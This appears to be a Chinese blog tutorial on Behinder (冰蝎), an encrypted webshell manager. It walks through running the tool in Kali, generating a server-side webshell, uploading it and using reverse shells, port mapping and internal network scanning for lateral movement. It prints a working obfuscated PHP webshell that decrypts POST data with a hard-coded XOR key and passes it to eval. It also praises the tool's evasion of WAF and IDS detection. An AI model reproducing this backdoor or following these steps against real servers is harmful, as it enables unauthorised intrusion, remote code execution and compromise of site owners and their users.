在前面的文章中，我们讲到过很多webshell管理工具。如蚁剑 weevely等工具。本文为大家大家推荐另外一款神器冰蝎。

关于冰蝎

冰蝎是一款动态二进制加密网站客户端。因流量动态加密，攻击特征安全设备（WAF、WebIDS）难以检测而闻名。

冰蝎通信过程中使用AES（高级加密算法，对称加密，微信小程序使用此种方法）进行加密，Java和.NET默认支持AES，php中需要开启openssl扩展，在V2.0版本后，php环境方式根据服务端支持情况动态选择，使得冰蝎更强大，V3.0中使用预共享密钥，全程无明文交互，给waf、ids设备威胁狩猎带来挑战。

在kali中安装

在常规情况下，冰蝎需要Java环境。因kali中已经安装了Java，我们无需安装，如果是其他环境，需要现先安装Java环境。到其项目地址:https://github.com/rebeyond/Behinder/releases下载最新安装包。

下载完成后，文件目录如下：

运行

我们只需执行下面命令即可运行。

java -jar Behinder.jar

使用

😘生成webshell

点击传输协议

🐻‍❄️关于密码

我们需要找一个md5加密网站，输入密码后，复制cmd5值小写32位的前16位。

点击生成服务端后，文件存放在server/default_xor_base64/

<?php
@error_reporting(0);
function Decrypt($data)
{
    $key="e45e329feb5d925b"; 
    $bs="base64_"."decode";
 $after=$bs($data."");
 for($i=0;$i<strlen($after);$i++) {
     $after[$i] = $after[$i]^$key[$i+1&15]; 
    }
    return $after;
}
$post=Decrypt(file_get_contents("php://input"));
@eval($post);
?>

对php文件进行扫毒

🦴上传服务器测试

将生成的php文件上传到服务器，并进行连接。

🐸基本信息

💕文件管理

🐯端口映射

😊反弹shell

我们可以根据提示配置msf相关信息，然后点击给我连，此时会将会话反弹的msf中。

🐼内网主机扫描

利用此功能，可以扫描在同一局域网内的设备。从而实现横向渗透。